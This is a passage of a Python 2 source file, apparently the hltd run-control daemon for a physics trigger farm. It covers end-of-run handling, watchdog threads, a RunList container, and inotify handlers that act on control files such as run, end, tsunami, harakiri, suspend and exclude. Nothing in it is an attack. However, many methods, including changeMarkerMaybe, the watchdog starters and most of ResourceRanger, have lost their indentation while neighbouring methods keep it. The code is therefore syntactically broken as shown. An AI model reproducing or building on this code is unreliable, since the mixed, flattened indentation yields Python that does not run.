                        logger.info('process '+str(resource.process.pid)+' completed')
                    except:pass
                resource.clearQuarantined()
                resource.process=None
            self.online_resource_list = []
            if conf.role == 'fu':
                logger.info('writing complete file')
                self.changeMarkerMaybe(Run.COMPLETE)
                try:
                    os.remove(conf.watch_directory+'/end'+str(self.runnumber).zfill(conf.run_number_padding))
                except:pass
                # reap the monitoring scripts (ignore "No child processes")
                try:
                    if conf.dqm_machine==False:
                        self.anelastic_monitor.wait()
                except OSError,ex:
                    if "No child processes" not in str(ex):
                        logger.info("Exception encountered in waiting for termination of anelastic:" +str(ex))
                self.anelastic_monitor = None
                if conf.use_elasticsearch == True:
                    try:
                        self.elastic_monitor.wait()
                    except OSError,ex:
                        if "No child processes" not in str(ex):
                            logger.info("Exception encountered in waiting for termination of anelastic:" +str(ex))
                    self.elastic_monitor = None
            if conf.delete_run_dir is not None and conf.delete_run_dir == True:
                try:
                    shutil.rmtree(self.dirname)
                except Exception as ex:
                    logger.exception(ex)
            global runList
            #todo:clear this external thread
            resource_lock.acquire()
            logger.info("active runs.."+str(runList.getActiveRunNumbers()))
            try:
                runList.remove(self.runnumber)
            except Exception as ex:
                logger.exception(ex)
            logger.info("new active runs.."+str(runList.getActiveRunNumbers()))
            global resources_blocked_flag
            if cloud_mode==True:
                if len(runList.getActiveRunNumbers())>=1:
                    logger.info("VM mode: waiting for runs: " + str(runList.getActiveRunNumbers()) + " to finish")
                else:
                    logger.info("No active runs. moving all resource files to cloud")
                    #give resources to cloud and bail out
                    entering_cloud_mode=False
                    #check if cloud mode switch has been aborted in the meantime
                    if abort_cloud_mode:
                        abort_cloud_mode=False
                        resources_blocked_flag=True
                        cloud_mode=False
                        resource_lock.release()
                        return
                    move_resources_to_cloud()
                    resource_lock.release()
                    ignite_cloud()
                    logger.info("cloud is on? : "+str(is_cloud_inactive()==False))
            # lock may or may not still be held at this point
            try:resource_lock.release()
            except:pass
        except Exception as ex:
            logger.error("exception encountered in ending run")
            logger.exception(ex)
            try:resource_lock.release()
            except:pass
def changeMarkerMaybe(self,marker):
dir = self.dirname
current = filter(lambda x: x in Run.VALID_MARKERS, os.listdir(dir))
if (len(current)==1 and current[0] != marker) or len(current)==0:
if len(current)==1: os.remove(dir+'/'+current[0])
fp = open(dir+'/'+marker,'w+')
fp.close()
else:
logger.error("There are more than one markers for run "
+str(self.runnumber))
return
def checkQuarantinedLimit(self):
allQuarantined=True
for r in self.online_resource_list:
try:
if r.watchdog.quarantined==False or r.processstate==100:allQuarantined=False
except:
allQuarantined=False
if allQuarantined==True:
return True
else:
return False
def startAnelasticWatchdog(self):
try:
self.anelasticWatchdog = threading.Thread(target = self.runAnelasticWatchdog)
self.anelasticWatchdog.start()
except Exception as ex:
logger.info("exception encountered in starting anelastic watchdog thread")
logger.info(ex)
    def runAnelasticWatchdog(self):
        # Thread body: block until anelastic.py exits. If the run is still
        # flagged ongoing, the exit was premature -> abort the whole run.
        try:
            self.anelastic_monitor.wait()
            if self.is_ongoing_run == True:
                #abort the run
                self.anelasticWatchdog=None
                logger.warning("Premature end of anelastic.py for run "+str(self.runnumber))
                self.Shutdown(killJobs=True,killScripts=True)
        except:
            pass
        self.anelastic_monitor=None
def startElasticBUWatchdog(self):
try:
self.elasticBUWatchdog = threading.Thread(target = self.runElasticBUWatchdog)
self.elasticBUWatchdog.start()
except Exception as ex:
logger.info("exception encountered in starting elasticbu watchdog thread")
logger.info(ex)
    def runElasticBUWatchdog(self):
        # Thread body: wait for elasticbu.py to finish, ignoring any error.
        try:
            self.elastic_monitor.wait()
        except:
            pass
        self.elastic_monitor=None
def startCompletedChecker(self):
try:
logger.info('start checking completion of run '+str(self.runnumber))
self.completedChecker = threading.Thread(target = self.runCompletedChecker)
self.completedChecker.start()
except Exception,ex:
logger.error('failure to start run completion checker:')
logger.exception(ex)
    def runCompletedChecker(self):
        """Thread body (BU): first wait for the EoR file (or disappearance of
        the run directory), then wait until no notified FU box reports the
        run as active before dropping it from the global run list."""
        rundirstr = 'run'+ str(self.runnumber).zfill(conf.run_number_padding)
        rundirCheckPath = os.path.join(conf.watch_directory, rundirstr)
        eorCheckPath = os.path.join(rundirCheckPath,rundirstr + '_ls0000_EoR.jsn')
        # initial grace period before polling
        self.threadEvent.wait(10)
        while self.stopThreads == False:
            self.threadEvent.wait(5)
            if os.path.exists(eorCheckPath) or os.path.exists(rundirCheckPath)==False:
                logger.info("Completed checker: detected end of run "+str(self.runnumber))
                break
        while self.stopThreads==False:
            self.threadEvent.wait(5)
            # success==True means all box data was readable and valid
            success, runFound = self.checkNotifiedBoxes()
            if success and runFound==False:
                resource_lock.acquire()
                try:
                    runList.remove(self.runnumber)
                except Exception as ex:
                    logger.exception(ex)
                resource_lock.release()
                logger.info("Completed checker: end of processing of run "+str(self.runnumber))
                break
    def createEmptyEoRMaybe(self):
        #this is used to notify elasticBU to fill the end time before it is terminated
        # Creates an empty EoR json in the run directory if none exists yet.
        rundirstr = 'run'+ str(self.runnumber).zfill(conf.run_number_padding)
        rundirCheckPath = os.path.join(conf.watch_directory, rundirstr)
        eorCheckPath = os.path.join(rundirCheckPath,rundirstr + '_ls0000_EoR.jsn')
        try:
            os.stat(eorCheckPath)
        except:
            # file missing -> create it and give watchers a moment to react
            logger.info('creating empty EoR file in run directory '+rundirCheckPath)
            try:
                with open(eorCheckPath,'w') as fi:
                    pass
                time.sleep(.5)
            except Exception as ex:
                logger.exception(ex)
    def checkNotifiedBoxes(self):
        """Inspect the cached FU box info (module-level boxinfoFUMap).

        Returns a (success, runFound) tuple:
          (False, False) -- some box data was missing/stale-status/invalid,
          (True, True)   -- at least one fresh box still lists this run,
          (True, False)  -- all fresh box data is valid and none lists it.
        """
        keys = boxinfoFUMap.keys()
        c_time = time.time()
        for key in keys:
            #if key==thishost:continue #checked in inotify thread
            try:
                edata,etime,lastStatus = boxinfoFUMap[key]
            except:
                #key deleted
                return False,False
            # entries older than 20 s are considered stale and skipped
            if c_time - etime > 20:continue
            #parsing or file access, check failed
            if lastStatus==False: return False,False
            try:
                #run is found in at least one box
                if self.runnumber in edata['activeRuns']:return True,True
            except:
                #invalid boxinfo data
                return False,False
        #all box data are valid, run not found
        return True,False
class RunList:
    """Bookkeeping container for active Run objects, in insertion order.

    Rewritten with list/generator comprehensions: the original used
    len(filter(...)) and map(...), which return lazy iterators under
    Python 3 (TypeError on len) — results are identical under Python 2.
    """
    def __init__(self):
        self.runs = []
    def add(self,runObj):
        """Append runObj; raise if its run number is already tracked."""
        runNumber = runObj.runnumber
        if any(r.runnumber == runNumber for r in self.runs):
            raise Exception("Run "+str(runNumber)+" already exists")
        self.runs.append(runObj)
    def remove(self,runNumber):
        """Drop all entries with this run number (duplicates are logged)."""
        matches = [r for r in self.runs if r.runnumber==runNumber]
        if len(matches)>1:
            logger.error("Multiple runs entries for "+str(runNumber)+" were found while removing run")
        for run in matches:
            self.runs.remove(run)
    def getOngoingRuns(self):
        """Runs still flagged as ongoing."""
        return [r for r in self.runs if r.is_ongoing_run==True]
    def getQuarantinedRuns(self):
        """Runs waiting for shutdown due to quarantine."""
        return [r for r in self.runs if r.pending_shutdown==True]
    def getActiveRuns(self):
        """Shallow copy of all tracked runs."""
        return self.runs[:]
    def getActiveRunNumbers(self):
        return [r.runnumber for r in self.runs]
    def getLastRun(self):
        """Most recently added run, or None when empty."""
        try:
            return self.runs[-1]
        except:
            return None
    def getLastOngoingRun(self):
        try:
            return self.getOngoingRuns()[-1]
        except:
            return None
    def getRun(self,runNumber):
        """First run with this number, or None."""
        for r in self.runs:
            if r.runnumber==runNumber:
                return r
        return None
    def isLatestRun(self,runObj):
        #TODO:test
        return self.runs[-1] == runObj
    def getStateDoc(self):
        """Summary dicts for monitoring."""
        docArray = []
        for runObj in self.runs:
            docArray.append({'run':runObj.runnumber,'totalRes':runObj.n_used,'qRes':runObj.n_quarantined,'ongoing':runObj.is_ongoing_run,'errors':runObj.num_errors})
        return docArray
class RunRanger:
    """Watches the hltd run base directory via inotify and dispatches on the
    name of each file/directory created there (runNNN, endNNN, herod,
    tsunami, exclude/include, suspend, stop, ...). This is the main control
    entry point of the daemon.

    Fixes applied in this revision:
    - 'end' handler: 'endingRun.is_ongoing_run==False' was a no-op
      comparison, now an assignment;
    - 'cleanoutput'/'cleanramdisk': log messages referenced the undefined
      variable 'rn' (NameError) in the clean-all branch;
    - 'quarantined': os.remove() was called on the bare basename instead of
      the notification file's full path.
    """
    def __init__(self,instance):
        self.inotifyWrapper = InotifyWrapper(self)
        self.instance = instance
    def register_inotify_path(self,path,mask):
        self.inotifyWrapper.registerPath(path,mask)
    def start_inotify(self):
        self.inotifyWrapper.start()
    def stop_inotify(self):
        self.inotifyWrapper.stop()
        self.inotifyWrapper.join()
        logger.info("RunRanger: Inotify wrapper shutdown done")
    def process_IN_CREATE(self, event):
        """Dispatch a newly created file/directory in the watch directory."""
        nr=0
        global runList
        global cloud_mode
        global entering_cloud_mode
        global exiting_cloud_mode
        global abort_cloud_mode
        global resources_blocked_flag
        global cached_pending_run
        global disabled_resource_allocation
        global masked_resources
        fullpath = event.fullpath
        logger.info('RunRanger: event '+fullpath)
        dirname=fullpath[fullpath.rfind("/")+1:]
        logger.info('RunRanger: new filename '+dirname)
        if dirname.startswith('run'):
            if dirname.endswith('.reprocess'):
                #reprocessing triggered
                dirname = dirname[:dirname.rfind('.reprocess')]
                fullpath = fullpath[:fullpath.rfind('.reprocess')]
                logger.info('Triggered reprocessing of '+ dirname)
                try:os.unlink(event.fullpath)
                except:
                    try:os.rmdir(event.fullpath)
                    except:pass
            if os.path.islink(fullpath):
                logger.info('directory ' + fullpath + ' is link. Ignoring this run')
                return
            if not os.path.isdir(fullpath):
                logger.info(fullpath +' is a file. A directory is needed to start a run.')
                return
            nr=int(dirname[3:])
            if nr!=0:
                # the dqm BU processes a run if the "global run file" is not mandatory or if the run is a global run
                is_global_run = os.path.exists(fullpath[:fullpath.rfind("/")+1] + dqm_globalrun_filepattern.format(str(nr).zfill(conf.run_number_padding)))
                dqm_processing_criterion = (not conf.dqm_globallock) or (conf.role != 'bu') or (is_global_run)
                if (not conf.dqm_machine) or dqm_processing_criterion:
                    try:
                        logger.info('new run '+str(nr))
                        #terminate quarantined runs
                        for run in runList.getQuarantinedRuns():
                            #run shutdown waiting for scripts to finish
                            run.startShutdown(True,False)
                            time.sleep(.1)
                        resources_blocked_flag=False
                        if cloud_mode==True:
                            logger.info("received new run notification in CLOUD mode. Ignoring new run.")
                            #remember this run and attempt to continue it once hltd exits the cloud mode
                            cached_pending_run = fullpath
                            os.rmdir(fullpath)
                            return
                        if conf.role == 'fu':
                            bu_dir = bu_disk_list_ramdisk_instance[0]+'/'+dirname
                            try:
                                os.symlink(bu_dir+'/jsd',fullpath+'/jsd')
                            except:
                                if not conf.dqm_machine:
                                    logger.warning('jsd directory symlink error, continuing without creating link')
                                pass
                        else:
                            bu_dir = ''
                        #check if this run is a duplicate
                        if runList.getRun(nr)!=None:
                            raise Exception("Attempting to create duplicate run "+str(nr))
                        # in case of a DQM machines create an EoR file
                        if conf.dqm_machine and conf.role == 'bu':
                            for run in runList.getOngoingRuns():
                                EoR_file_name = run.dirname + '/' + 'run' + str(run.runnumber).zfill(conf.run_number_padding) + '_ls0000_EoR.jsn'
                                if run.is_ongoing_run and not os.path.exists(EoR_file_name):
                                    # create an EoR file that will trigger all the running jobs to exit nicely
                                    open(EoR_file_name, 'w').close()
                        run = Run(nr,fullpath,bu_dir,self.instance)
                        if not run.inputdir_exists and conf.role=='fu':
                            logger.info('skipping '+ fullpath + ' with raw input directory missing')
                            shutil.rmtree(fullpath)
                            del(run)
                            return
                        resource_lock.acquire()
                        runList.add(run)
                        try:
                            if conf.role=='fu' and not entering_cloud_mode and not has_active_resources():
                                logger.error('trying to start a run '+str(run.runnumber)+ ' without any available resources - this requires manual intervention !')
                        except Exception as ex:
                            logger.exception(ex)
                        if run.AcquireResources(mode='greedy'):
                            run.CheckTemplate()
                            run.Start()
                        else:
                            #BU mode: failed to get blacklist
                            runList.remove(nr)
                            resource_lock.release()
                            del(run)
                            return
                        resource_lock.release()
                        if conf.role == 'bu' and conf.instance != 'main':
                            logger.info('creating run symlink in main ramdisk directory')
                            main_ramdisk = os.path.dirname(os.path.normpath(conf.watch_directory))
                            os.symlink(fullpath,os.path.join(main_ramdisk,os.path.basename(fullpath)))
                    except OSError as ex:
                        logger.error("RunRanger: "+str(ex)+" "+ex.filename)
                        logger.exception(ex)
                    except Exception as ex:
                        logger.error("RunRanger: unexpected exception encountered in forking hlt slave")
                        logger.exception(ex)
                    try:resource_lock.release()
                    except:pass
        elif dirname.startswith('emu'):
            nr=int(dirname[3:])
            if nr!=0:
                try:
                    """
                    start a new BU emulator run here - this will trigger the start of the HLT run
                    """
                    bu_emulator.startNewRun(nr)
                except Exception as ex:
                    logger.info("exception encountered in starting BU emulator run")
                    logger.info(ex)
                os.remove(fullpath)
        elif dirname.startswith('end'):
            # need to check is stripped name is actually an integer to serve
            # as run number
            if dirname[3:].isdigit():
                nr=int(dirname[3:])
                if nr!=0:
                    try:
                        endingRun = runList.getRun(nr)
                        if endingRun==None:
                            logger.warning('request to end run '+str(nr)
                                           +' which does not exist')
                            os.remove(fullpath)
                        else:
                            logger.info('end run '+str(nr))
                            #remove from runList to prevent intermittent restarts
                            #lock used to fix a race condition when core files are being moved around
                            # fixed: this was '==' (a no-op comparison)
                            endingRun.is_ongoing_run=False
                            time.sleep(.1)
                            if conf.role == 'fu':
                                endingRun.StartWaitForEnd()
                            if bu_emulator and bu_emulator.runnumber != None:
                                bu_emulator.stop()
                            #logger.info('run '+str(nr)+' removing end-of-run marker')
                            #os.remove(fullpath)
                    except Exception as ex:
                        logger.info("exception encountered when waiting hlt run to end")
                        logger.info(ex)
                else:
                    logger.error('request to end run '+str(nr)
                                 +' which is an invalid run number - this should '
                                 +'*never* happen')
            else:
                logger.error('request to end run '+str(nr)
                             +' which is NOT a run number - this should '
                             +'*never* happen')
        elif dirname.startswith('herod') or dirname.startswith('tsunami'):
            os.remove(fullpath)
            if conf.role == 'fu':
                global q_list
                logger.info("killing all CMSSW child processes")
                for run in runList.getActiveRuns():
                    run.Shutdown(True,False)
                time.sleep(.2)
                #clear all quarantined cores
                for cpu in q_list:
                    try:
                        logger.info('Clearing quarantined resource '+cpu)
                        os.rename(quarantined+cpu,idles+cpu)
                    except:
                        logger.info('Quarantined resource was already cleared: '+cpu)
                q_list=[]
            elif conf.role == 'bu':
                for run in runList.getActiveRuns():
                    run.createEmptyEoRMaybe()
                    run.ShutdownBU()
                #delete input and output BU directories
                if dirname.startswith('tsunami'):
                    logger.info('tsunami approaching: cleaning all ramdisk and output run data')
                    cleanup_bu_disks(None,True,True)
                #contact any FU that appears alive
                boxdir = conf.resource_base +'/boxes/'
                try:
                    dirlist = os.listdir(boxdir)
                    current_time = time.time()
                    logger.info("sending herod to child FUs")
                    for name in dirlist:
                        if name == os.uname()[1]:continue
                        age = current_time - os.path.getmtime(boxdir+name)
                        logger.info('found box '+name+' with keepalive age '+str(age))
                        if age < 20:
                            try:
                                connection = httplib.HTTPConnection(name, conf.cgi_port - conf.cgi_instance_port_offset,timeout=5)
                                time.sleep(0.05)
                                connection.request("GET",'cgi-bin/herod_cgi.py')
                                time.sleep(0.1)
                                response = connection.getresponse()
                            except Exception as ex:
                                logger.error("exception encountered in contacting resource "+str(name))
                                logger.exception(ex)
                    logger.info("sent herod to all child FUs")
                except Exception as ex:
                    logger.error("exception encountered in contacting resources")
                    logger.info(ex)
        elif dirname.startswith('cleanoutput'):
            os.remove(fullpath)
            nlen = len('cleanoutput')
            if len(dirname)==nlen:
                # fixed: message referenced undefined 'rn' in this branch
                logger.info('cleaning output (all run data)')
                cleanup_bu_disks(None,False,True)
            else:
                try:
                    rn = int(dirname[nlen:])
                    logger.info('cleaning output (only for run '+str(rn)+')')
                    cleanup_bu_disks(rn,False,True)
                except:
                    logger.error('Could not parse '+dirname)
        elif dirname.startswith('cleanramdisk'):
            os.remove(fullpath)
            nlen = len('cleanramdisk')
            if len(dirname)==nlen:
                # fixed: message referenced undefined 'rn' in this branch
                logger.info('cleaning ramdisk (all run data)')
                cleanup_bu_disks(None,True,False)
            else:
                try:
                    rn = int(dirname[nlen:])
                    logger.info('cleaning ramdisk (only for run '+str(rn)+')')
                    cleanup_bu_disks(rn,True,False)
                except:
                    logger.error('Could not parse '+dirname)
        elif dirname.startswith('populationcontrol'):
            if len(runList.runs)>0:
                logger.info("terminating all ongoing runs via cgi interface (populationcontrol): "+str(runList.getActiveRunNumbers()))
                for run in runList.getActiveRuns():
                    if conf.role=='fu':
                        run.Shutdown(True,True)
                    elif conf.role=='bu':
                        run.ShutdownBU()
                logger.info("terminated all ongoing runs via cgi interface (populationcontrol)")
            os.remove(fullpath)
        elif dirname.startswith('harakiri') and conf.role == 'fu':
            os.remove(fullpath)
            pid=os.getpid()
            logger.info('asked to commit seppuku:'+str(pid))
            try:
                logger.info('sending signal '+str(SIGKILL)+' to myself:'+str(pid))
                retval = os.kill(pid, SIGKILL)
                logger.info('sent SIGINT to myself:'+str(pid))
                logger.info('got return '+str(retval)+'waiting to die...and hope for the best')
            except Exception as ex:
                logger.error("exception in committing harakiri - the blade is not sharp enough...")
                logger.error(ex)
        elif dirname.startswith('quarantined'):
            try:
                # fixed: remove the notification file itself; 'dirname' is a
                # bare basename resolved against the daemon's cwd
                os.remove(fullpath)
            except:
                pass
            if dirname[11:].isdigit():
                nr=int(dirname[11:])
                if nr!=0:
                    try:
                        run = runList.getRun(nr)
                        if run.checkQuarantinedLimit():
                            if runList.isLatestRun(run):
                                logger.info('reached quarantined limit - pending Shutdown for run:'+str(nr))
                                run.pending_shutdown=True
                            else:
                                logger.info('reached quarantined limit - initiating Shutdown for run:'+str(nr))
                                run.startShutdown(True,False)
                    except Exception as ex:
                        logger.exception(ex)
        elif dirname.startswith('suspend') and conf.role == 'fu':
            logger.info('suspend mountpoints initiated')
            replyport = int(dirname[7:]) if dirname[7:].isdigit()==True else conf.cgi_port
            global suspended
            suspended=True
            #terminate all ongoing runs
            for run in runList.getActiveRuns():
                run.Shutdown(True,True)
            time.sleep(.5)
            #local request used in case of stale file handle
            if replyport==0:
                umount_success = cleanup_mountpoints()
                try:os.remove(fullpath)
                except:pass
                suspended=False
                logger.info("Remount requested locally is performed.")
                return
            umount_success = cleanup_mountpoints(remount=False)
            if umount_success==False:
                time.sleep(1)
                logger.error("Suspend initiated from BU failed, trying again...")
                #notifying itself again
                try:os.remove(fullpath)
                except:pass
                fp = open(fullpath,"w+")
                fp.close()
                return
            #find out BU name from bus_config
            bu_name=None
            bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
            if os.path.exists(bus_config):
                for line in open(bus_config):
                    bu_name=line.split('.')[0]
                    break
            #first report to BU that umount was done
            try:
                if bu_name==None:
                    logger.fatal("No BU name was found in the bus.config file. Leaving mount points unmounted until the hltd service restart.")
                    os.remove(fullpath)
                    return
                connection = httplib.HTTPConnection(bu_name, replyport+20,timeout=5)
                connection.request("GET",'cgi-bin/report_suspend_cgi.py?host='+os.uname()[1])
                response = connection.getresponse()
            except Exception as ex:
                logger.error("Unable to report suspend state to BU "+str(bu_name)+':'+str(replyport+20))
                logger.exception(ex)
            #loop while BU is not reachable
            while True:
                try:
                    #reopen bus.config in case is modified or moved around
                    bu_name=None
                    bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
                    if os.path.exists(bus_config):
                        try:
                            for line in open(bus_config):
                                bu_name=line.split('.')[0]
                                break
                        except:
                            logger.info('exception test 1')
                            time.sleep(5)
                            continue
                    if bu_name==None:
                        logger.info('exception test 2')
                        time.sleep(5)
                        continue
                    logger.info('checking if BU hltd is available...')
                    connection = httplib.HTTPConnection(bu_name, replyport,timeout=5)
                    connection.request("GET",'cgi-bin/getcwd_cgi.py')
                    response = connection.getresponse()
                    logger.info('BU hltd is running !...')
                    #if we got here, the service is back up
                    break
                except Exception as ex:
                    try:
                        logger.info('Failed to contact BU hltd service: ' + str(ex.args[0]) +" "+ str(ex.args[1]))
                    except:
                        logger.info('Failed to contact BU hltd service '+str(ex))
                    time.sleep(5)
            #mount again
            cleanup_mountpoints()
            try:os.remove(fullpath)
            except:pass
            suspended=False
            logger.info("Remount is performed")
        elif dirname=='stop' and conf.role == 'fu':
            logger.fatal("Stopping all runs..")
            masked_resources=True
            #make sure to not run inotify acquire while we are here
            resource_lock.acquire()
            disabled_resource_allocation=True
            resource_lock.release()
            #shut down any quarantined runs
            try:
                for run in runList.getQuarantinedRuns():
                    run.Shutdown(True,False)
                listOfActiveRuns = runList.getActiveRuns()
                for run in listOfActiveRuns:
                    if not run.pending_shutdown:
                        if len(run.online_resource_list)==0:
                            run.Shutdown(True,False)
                        else:
                            resource_lock.acquire()
                            run.Stop()
                            resource_lock.release()
                    time.sleep(.1)
            except Exception as ex:
                logger.fatal("Unable to stop run(s)")
                logger.exception(ex)
            disabled_resource_allocation=False
            try:resource_lock.release()
            except:pass
            os.remove(fullpath)
        elif dirname.startswith('exclude') and conf.role == 'fu':
            #service on this machine is asked to be excluded for cloud use
            if cloud_mode:
                logger.info('already in cloud mode')
                os.remove(fullpath)
                return
            else:
                logger.info('machine exclude initiated')
                if is_cloud_inactive()>=100:
                    logger.error("Unable to switch to cloud mode (igniter script error)")
                    os.remove(fullpath)
                    return
                #make sure to not run not acquire resources by inotify while we are here
                resource_lock.acquire()
                cloud_mode=True
                entering_cloud_mode=True
                resource_lock.release()
                time.sleep(.1)
                #shut down any quarantined runs
                try:
                    for run in runList.getQuarantinedRuns():
                        run.Shutdown(True,False)
                    requested_stop=False
                    listOfActiveRuns = runList.getActiveRuns()
                    for run in listOfActiveRuns:
                        if not run.pending_shutdown:
                            if len(run.online_resource_list)==0:
                                run.Shutdown(True,False)
                            else:
                                resource_lock.acquire()
                                requested_stop=True
                                run.Stop()
                                resource_lock.release()
                        time.sleep(.1)
                    resource_lock.acquire()
                    if requested_stop==False:
                        #no runs present, switch to cloud mode immediately
                        entering_cloud_mode=False
                        move_resources_to_cloud()
                        resource_lock.release()
                        ignite_cloud()
                        logger.info("cloud is on? : "+str(is_cloud_inactive()==False))
                except Exception as ex:
                    logger.fatal("Unable to clear runs. Will not enter VM mode.")
                    logger.exception(ex)
                    entering_cloud_mode=False
                    cloud_mode=False
                try:resource_lock.release()
                except:pass
                os.remove(fullpath)
        elif dirname.startswith('include') and conf.role == 'fu':
            #masked_resources=False
            if cloud_mode==False:
                logger.error('received notification to exit from cloud but machine is not in cloud mode!')
                os.remove(fullpath)
                if not is_cloud_inactive():
                    logger.info('cloud scripts are running, trying to stop')
                    extinguish_cloud()
                return
            resource_lock.acquire()
            if entering_cloud_mode:
                abort_cloud_mode=True
                resource_lock.release()
                os.remove(fullpath)
                return
            resource_lock.release()
            #run stop cloud notification
            exiting_cloud_mode=True
            if is_cloud_inactive():
                logger.warning('received command to deactivate cloud, but cloud scripts are not running!')
            extinguish_cloud()
            while True:
                last_status = is_cloud_inactive()
                if last_status==0: #state: running
                    logger.info('cloud scripts are still active')
                    time.sleep(1)
                    continue
                else:
                    logger.info('cloud scripts have been deactivated')
                    if last_status>1:
                        logger.warning('Received error code from cloud igniter script. Switching off cloud mode')
                    break
            resource_lock.acquire()
            resources_blocked_flag=True
            cloud_mode=False
            cleanup_resources()
            resource_lock.release()
            exiting_cloud_mode=False
            os.remove(fullpath)
            if cached_pending_run != None:
                #create last pending run received during the cloud mode
                time.sleep(5) #let core file notifications run
                os.mkdir(cached_pending_run)
                cached_pending_run = None
            else: time.sleep(2)
            logger.info('cloud mode in hltd has been switched off')
        elif dirname.startswith('logrestart'):
            #hook to restart logcollector process manually
            restartLogCollector(self.instance)
            os.remove(fullpath)
        logger.debug("RunRanger completed handling of event "+fullpath)
    def process_default(self, event):
        """Log any inotify event type we do not explicitly handle."""
        logger.info('RunRanger: event '+event.fullpath+' type '+str(event.mask))
        filename=event.fullpath[event.fullpath.rfind("/")+1:]
class ResourceRanger:
    def __init__(self):
        # inotify wrapper delivers filesystem events to the process_* methods;
        # the managed system_monitor publishes this box's status files
        self.inotifyWrapper = InotifyWrapper(self)
        self.managed_monitor = system_monitor()
        self.managed_monitor.start()
        # list of directories registered for watching
        self.regpath = []
def register_inotify_path(self,path,mask):
self.inotifyWrapper.registerPath(path,mask)
self.regpath.append(path)
def start_inotify(self):
self.inotifyWrapper.start()
def stop_managed_monitor(self):
self.managed_monitor.stop()
self.managed_monitor.join()
logger.info("ResourceRanger: managed monitor shutdown done")
def stop_inotify(self):
self.inotifyWrapper.stop()
self.inotifyWrapper.join()
logger.info("ResourceRanger: Inotify wrapper shutdown done")
def process_IN_MOVED_TO(self, event):
logger.debug('ResourceRanger-MOVEDTO: event '+event.fullpath)
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
try:
resourcepath=event.fullpath[1:event.fullpath.rfind("/")]
resourcestate=resourcepath[resourcepath.rfind("/")+1:]
resourcename=event.fullpath[event.fullpath.rfind("/")+1:]
resource_lock.acquire()
if not (resourcestate == 'online' or resourcestate == 'cloud'
or resourcestate == 'quarantined'):
logger.debug('ResourceNotifier: new resource '
+resourcename
+' in '
+resourcepath
+' state '
+resourcestate
)
if cloud_mode and not entering_cloud_mode and not exiting_cloud_mode and not abort_cloud_mode and not disabled_resource_allocation:
time.sleep(1)
logging.info('detected resource moved to non-cloud resource dir while already switched to cloud mode. Deactivating cloud.')
with open(os.path.join(conf.watch_directory,'include'),'w+') as fobj:
pass
resource_lock.release()
time.sleep(1)
return
run = runList.getLastOngoingRun()
if run is not None:
logger.info("ResourceRanger: found active run "+str(run.runnumber)+ " when received inotify MOVED event for "+event.fullpath)
"""grab resources that become available
#@@EM implement threaded acquisition of resources here
"""
#find all idle cores
idlesdir = '/'+resourcepath
try:
reslist = os.listdir(idlesdir)
except Exception as ex:
logger.info("exception encountered in looking for resources")
logger.exception(ex)
#put inotify-ed resource as the first item
fileFound=False
for resindex,resname in enumerate(reslist):
fileFound=False
if resname == resourcename:
fileFound=True
if resindex != 0:
firstitem = reslist[0]
reslist[0] = resourcename
reslist[resindex] = firstitem
break
if fileFound==False:
#inotified file was already moved earlier
resource_lock.release()
return
#acquire sufficient cores for a multithreaded process start
#returns whether it can be matched to existing online resource or not
matchedList = run.MatchResource(reslist)
if matchedList:
#matched with previous resource (restarting process)
acquired_sufficient = True
res = run.AcquireResource(matchedList,resourcestate)
else:
resourcenames = []
for resname in reslist:
if len(resourcenames) < nstreams:
resourcenames.append(resname)
else:
break
acquired_sufficient = False
if len(resourcenames) == nstreams:
acquired_sufficient = True
res = run.AcquireResource(resourcenames,resourcestate)
if acquired_sufficient:
logger.info("ResourceRanger: acquired resource(s) "+str(res.cpu))
run.StartOnResource(res)
logger.info("ResourceRanger: started process on resource "
+str(res.cpu))
else:
#if no run is active, move (x N threads) files from except to idle to be picked up for the next run
#todo: debug,write test for this...
if resourcestate == 'except':
idlesdir = '/'+resourcepath
try:
reslist = os.listdir(idlesdir)
#put inotify-ed resource as the first item
fileFound=False
for resindex,resname in enumerate(reslist):
if resname == resourcename:
fileFound=True
if resindex != 0:
firstitem = reslist[0]
reslist[0] = resourcename
reslist[resindex] = firstitem
break
if fileFound==False:
#inotified file was already moved earlier
resource_lock.release()
return
resourcenames = []
for resname in reslist:
if len(resourcenames) < nstreams:
resourcenames.append(resname)
else:
break
if len(resourcenames) == nstreams:
for resname in resourcenames:
os.rename(broken+resname,idles+resname)
except Exception as ex:
logger.info("exception encountered in looking for resources in except")
logger.info(ex)
elif resourcestate=="cloud":
#check if cloud mode was initiated, activate if necessary
if conf.role=='fu' and cloud_mode==False:
time.sleep(1)
logging.info('detected core moved to cloud resources. Triggering cloud activation sequence.')
with open(os.path.join(conf.watch_directory,'exclude'),'w+') as fobj:
pass
time.sleep(1)
except Exception as ex:
logger.error("exception in ResourceRanger")
logger.error(ex)
try:
resource_lock.release()
except:pass
def process_IN_MODIFY(self, event):
logger.debug('ResourceRanger-MODIFY: event '+event.fullpath)
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
try:
#this should be error (i.e. bus.confg should not be modified during a run)
bus_config = os.path.join(os.path.dirname(conf.resource_base.rstrip(os.path.sep)),'bus.config')
if event.fullpath == bus_config:
logger.warning("automatic remounting on changed bus.config is no longer supported. restart hltd to remount")
if False:
if self.managed_monitor:
self.managed_monitor.stop()
self.managed_monitor.join()
cleanup_mountpoints()
if self.managed_monitor:
self.managed_monitor = system_monitor()
self.managed_monitor.start()
logger.info("ResouceRanger: managed monitor is "+str(self.managed_monitor))
except Exception as ex:
logger.error("exception in ResourceRanger")
logger.error(ex)
def process_IN_CREATE(self, event):
logger.debug('ResourceRanger-CREATE: event '+event.fullpath)
if conf.dqm_machine:return
basename = os.path.basename(event.fullpath)
if basename.startswith('resource_summary'):return
if basename=='blacklist':return
if basename.startswith('test'):return
if conf.role!='bu' or basename.endswith(os.uname()[1]):
return
try:
resourceage = os.path.getmtime(event.fullpath)
resource_lock.acquire()
lrun = runList.getLastRun()
newRes = None
if lrun!=None:
if lrun.checkStaleResourceFile(event.fullpath):
logger.error("Run "+str(lrun.runnumber)+" notification: skipping resource "+basename+" which is stale")
resource_lock.release()
return
logger.info('Try attaching FU resource: last run is '+str(lrun.runnumber))
newRes = lrun.maybeNotifyNewRun(basename,resourceage)
resource_lock.release()
if newRes:
newRes.NotifyNewRun(lrun.runnumber)
except Exception as ex:
logger.exception(ex)
try:resource_lock.release()
except:pass
def process_default(self, event):
logger.debug('ResourceRanger: event '+event.fullpath +' type '+ str(event.mask))
